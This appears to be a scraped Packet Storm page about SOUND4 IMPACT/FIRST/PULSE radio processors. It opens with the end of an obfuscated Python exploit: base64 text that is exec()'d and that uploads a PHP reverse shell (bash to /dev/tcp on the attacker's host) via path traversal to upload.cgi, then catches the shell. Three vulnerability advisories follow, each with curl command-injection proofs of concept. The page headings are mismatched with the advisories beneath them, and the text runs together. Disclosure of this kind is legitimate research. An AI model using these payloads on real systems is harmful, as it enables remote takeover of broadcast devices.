"tLS0tVGhlTWVudSIsDQogICAgICAgICAgI"importer += "CAgICAgI"+            "CAgICAgICAiQWNjZXB0LUxhbmd1YWdlI"importer += "iA6ICJlb"+              "i1VUyxlbjtxPTAuOSIsDQogICAgICA"importer += "gICAgICA"+                "gICAgICAgICAgICAiQWNjZXB0LUV"importer += "uY29kaW5"+                  "nIiA6ICJnemlwLCBkZWZsYXRlI"importer += "iwNCiAgI"+                    "CAgICAgICAgICAgICAgICAgI"importer += "CAgICJVc"+                      "2VyLUFnZW50IiA6IHNlbGY"importer += "uc2VjcmV"+                        "0YWdlbnQsDQogICAgICA"importer += "gICAgICAg"+                       "ICAgICAgICAgICAiQ2Fj"importer += "aGUtQ29udH"+                      "JvbCIgOiAibWF4LWFnZT"importer += "0wIiwgDQogI"+                     "CAgICAgICAgICAgICAgI"importer += "CAgICAgICAiQ2"+                   "9ubmVjdGlvbiIgOiAiY2"importer += "xvc2UiLA0KICAgI"+                 "CAgICAgICAgICAgICAgI"importer += "CAgICAgIkFjY2VwdC"+               "IgOiAiKi8qIn0NCiAgIC"importer += "ANCiAgICAgICAgc2VsZ"+             "i5wYXlsb2FkID0gIjw/c"importer += "GhwIGV4ZWMoXCIvYmluL2"+          "Jhc2ggLWMgJ2Jhc2ggLWk"importer += "gPiAvZGV2L3RjcC8iK3Nlb"+        "GYubGhvc3QrIi8iK3N0cih"importer += "zZWxmLmxwb3J0KSsiIDwmM"+        "TtybSBiLnBocCdcIik7Ig0"importer += "KDQogICAgICAgIHNlbGYuZ"+        "GVwbG95ICA9ICItLS0tLS1"importer += "UaGVNZW51XHJcbkNvbnRlbn"+        "QtRGlzcG9zaXRpb246IGZ"importer += "vcm0tZGF0YTsiI3VzDQogICA"+        "gICAgIHNlbGYuZGVwbG9"importer += "5ICs9ICIgbmFtZT1cInVwZ2Zp"+        "bGVcIjsgZmlsZW5hbWU"importer += "9XCIuLi8uLi8uLi8uLi8uLi8uL"+        "i8iI01lDQogICAgICA"importer += "gIHNlbGYuZGVwbG95ICs9ICIuLi"+        "92YXIvd3d3L2IucGh"importer += "wXCJcclxuQ29udGVudC1UeXBlOiB"+        "hcHBsaWNhdGlvbi8"importer += "iI2NvDQogICAgICAgIHNlbGYuZGVw"+        "bG95ICs9ICJvY3R"importer += "ldC1zdHJlYW1cclxuXHJcbiIrc2VsZ"+        "i5wYXlsb2FkKyJ"importer += "cclxuLS0tLS0tVGgiIy4uDQogICAgIC"+        "AgIHNlbGYuZGV"importer += "wbG95ICs9ICJlTWVudVxyXG5Db250ZW5"+        "0LURpc3Bvc2l"importer += "0aW9uOiBmb3JtLWRhdGE7IG5hbWU9XCIi"+        "I24NCiAgICA"importer += "gICAgc2VsZi5kZXBsb3kgKz0gInN1Ym1pd"+        "FwiXHJcblx"importer += "yXG5EbyBpdFxyXG4tLS0tLS1UaGVNZW51LS"+        "1cclxuIiM"importer += "tLS0tLS0NCiAgICANCiAgICAgICAgcmVxdWV"+        "zdHMucG9"importer += "zdChzZWxmLnJob3N0KyIvY2dpLWJpbi91cGxv"+        "YWQuY2d"importer += "pIiwgaGVhZGVycz1zZWxmLmhlYWRlcnMsIGRhd"+        "GE9c2V"importer += "sZi5kZXBsb3kpDQogICAgICAgIHNsZWVwKDEpIC"+        "ANCiA"importer += "gICAgICAgcmVxdWVzdHMuZ2V0KHNlbGYucmhvc3Q"+        "rIi9"importer += "iLnBocCIpDQoNCiAgICBkZWYgdGhlX3N1YnAoc2Vs"+        "Zik"importer += "6DQogICAgICAgIGtvbmFjID0gdGhyZWFkaW5nLlRoc"+        "mV"importer += "hZChuYW1lPSJaU0wiLCB0YXJnZXQ9c2VsZi50aGVfZW"+        "F"importer += "yKQ0KICAgICAgICBrb25hYy5zdGFydCgpDQogICAgIC"+        "A"importer += "gIHNsZWVwKDEpDQogICAgICAgIHNlbGYudGhlX3VwbG"+        "9"importer += "hZCgpDQoNCiAgICBkZWYgdGhlX2VhcihzZWxmKToNC"+        "iA"importer += "gICAgICAgdGVsbmV0dXMgPSB0ZWxuZXRsaWIuVGVs"+        "bmV"importer += "0KCkNCiAgICAgICAgcHJpbnQoIlN0YXJ0aW5nIGh"+        "hbmR"importer += "sZXIgb24gcG9ydCB7fS4iLmZvcm1hdChzZWxmLm"+        "xwb3J"importer += "0KSkNCiAgICAgICAgcyA9IHNvY2tldC5zb2NrZ"+        "XQoc29"importer += "ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NU"+        "UkVBTSk"importer += "NCiAgICAgICAgcy5iaW5kKCgiMC4wLjAuMCI"+        "sIHNlbGY"importer += "ubHBvcnQpKQ0KICAgICAgICB3aGlsZSBUcn"+        "VlOg0KICA"importer += "gICAgICAgICAgdHJ5Og0KICAgICAgICAgI"+        "CAgICAgIHM"importer += "uc2V0dGltZW91dCg3KQ0KICAgICAgICAg"+        "ICAgICAgIHM"importer += "ubGlzdGVuKDEpDQogICAgICAgICAgICA"+        "gICAgY29ubiw"importer += "gYWRkciA9IHMuYWNjZXB0KCkNCiAgIC"+        "AgICAgICAgICA"importer += "gICBwcmludCgiQ29ubmVjdGlvbiBmc"+        "m9tIHt9Ont9Ii5"importer += "mb3JtYXQoYWRkclswXSwgYWRkclsx"+        "XSkpDQogICAgICA"importer += "gICAgICAgICAgdGVsbmV0dXMuc29"+        "jayA9IGNvbm4NCiA"importer += "gICAgICAgICAgIGV4Y2VwdCBzb2"+        "NrZXQudGltZW91dCB"importer += "hcyBwOg0KICAgICAgICAgICAgI"+        "CAgIHByaW50KCJIbW1"importer += "tICh7bXNnfSkiLmZvcm1hdCht"+        "c2c9cCkpDQogICAgICA"importer += "gICAgICAgICAgcy5jbG9zZSg"+        "pDQogICAgICAgICAgICA"importer += "gICAgZXhpdCgwKQ0KICAgIC"+        "AgICAgICAgYnJlYWsNCg0"importer += "KICAgICAgICBwcmludCgiW"+        "W91IGdvdCBzaGVsbC4iKQ0"importer += "KICAgICAgICB0ZWxuZXR1"+        "cy5pbnRlcmFjdCgpDQogICA"importer += "gICAgIGNvbm4uY2xvc2U"+        "oKQ0KDQogICAgZGVmIG1haW4"importer += "oc2VsZik6DQogICAgIC"+        "AgIHNlbGYudGhlX2FyZ3MoKQ0"importer += "KICAgICAgICBzZWxmL"+        "nRoZV9zdWJwKCkNCg0KaWYgX19"importer += "uYW1lX18gPT0gJ19f"+        "bWFpbl9fJzoNCiAgICBWaWRlb0t"importer += "pbGxlZFRoZVJhZGl"+        "vU3RhcigpLm1haW4oKQ0K"######"retropmi  = "U2VjdXJpdHkgaXM"+        "gbGlrZSBhbiBvbmlvbjogdGhlIG1v"retropmi += "cmUgbGF5ZXJzIH"+        "lvdSBwZWVsLCB0aGUgbW9yZSBpdCBz"retropmi += "dGlua3Mu"####"+        "###############################"radio_code = base64.b64decode(importer)curves = [ord(c) for c in retropmi]maxi = max(curves)mini = min(curves)code_range = maxi - minijcoords = [int(20 * (1 - (codeio - mini) / code_range)) for codeio in curves]for y in range(20, 0, -1):    line = ""    for x in range(len(jcoords)):        if jcoords[x] >= y:            line += "-"        else:            line += " "    print(line)    time.sleep(0.03/1.337)exec(radio_code)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x upload.cgi Code Execution

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a conditional command injection vulnerability in traceroute.php.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: This vulnerability allows a local authenticated user to create afile in the /tmp directory that contains malicious commands. The filemust have the filename ending with .traceroute.pid, and the commands inthe file can only be executed once by an external unauthenticated attacker.By calling the vulnerable script and making a single HTTP POST request,the attacker can gain command execution on the system. After the requestis made, the file containing the malicious commands will be deleted.-------------------------------------------------------------------------/var/www/traceroute.php:------------------------02:    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['traceroute_host']) && isset($_POST['networkid'])) {03:        $pidfilename="/tmp/" . $_POST['networkid'] . ".traceroute.pid";04:        if( file_exists($pidfilename)) {05:             $procid=file_get_contents($pidfilename);06:             shell_exec("pkill -P ".$procid);07:        }......29:            unlink($pidfilename);30:            exit();-------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5740Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php26.09.2022--#On the server> echo ";id>/var/www/b" > /tmp/251.traceroute.pid#External> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=t00t&networkid=251"> curl -XPOST -sk https://RADIO/buid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x traceroute.php Conditional Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username related unauthenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Unauthenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated OS command injectionvulnerability. This can be exploited to inject and execute arbitrary shellcommands through the 'username' HTTP POST parameter through index.php andlogin.php script.========================================================================/var/www/login.php:-------------------09: if (isset($_POST['username']) && isset($_POST['password'])) {10:11:    $ret = -1;12:    // remarque: Check Password for broken, only admin/admin as valid user/password13:    exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5739Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5739.php26.09.2022--> curl --fail -XPOST -sko nul https://RADIOGAGA/index.php --data "username=`id>/var/www/j`&password=ZSL" && curl -sk https://RADIOGAGA/juid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x username Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a password related unauthenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Unauthenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated OS command injectionvulnerability. This can be exploited to inject and execute arbitrary shellcommands through the 'password' HTTP POST parameter through index.php andlogin.php script.========================================================================/var/www/login.php:-------------------09: if (isset($_POST['username']) && isset($_POST['password'])) {10:11:    $ret = -1;12:    // remarque: Check Password for broken, only admin/admin as valid user/password13:    exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5738Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php26.09.2022--> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/guid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

Source

Packet Storm